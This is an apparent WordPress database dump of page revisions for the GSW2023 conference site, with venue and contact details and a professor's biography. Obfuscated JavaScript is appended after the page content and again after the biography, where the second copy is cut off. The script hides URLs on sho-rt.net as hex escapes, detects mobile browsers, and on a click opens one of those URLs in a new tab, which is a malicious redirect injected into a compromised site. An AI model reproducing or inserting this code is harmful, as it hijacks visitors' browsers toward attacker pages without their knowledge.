btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row]\r\n\r\n[vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-03 11:51:51','2023-06-03 11:51:51','',3066,'https://gsw2023.com/?p=4628',0,'revision','',0),
(4629,1,'2023-06-03 11:58:12','2023-06-03 11:58:12','<!-- wp:paragraph -->\n<p>Prof. Aliaa A. A. Youssif is Currently a professor, at College of Computing and Information<br>Technology, Arab Academy for science technology and Maritime Transport (AAST), Cairo,<br>Egypt.<br>She received her BSc and MSc degrees in telecommunications and electronics engineering from<br>Helwan University. She also completed her Ph.D. at Helwan University. She had a postdoctoral<br>at George Washington University, USA in 2005. In addition, she was a visiting professor at many<br>universities such as Cardiff University in United Kingdome 2008 and International Telematic<br>University in Italy 2012, Masaryk University, Czech Republic (2016), Oviedo University, Spain<br>(2017), Vilnius Gediminas Technical University, Lithuania (2018), Cardiff Metropolitan University,<br>UK (2020).<br>Prof. Aliaa shared in many projects funded by EU. Her research interests include pattern<br>recognition, artificial intelligence, and signal processing. She has co-authored more than 120<br>manuscripts published in peer reviewed journals and conferences.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return 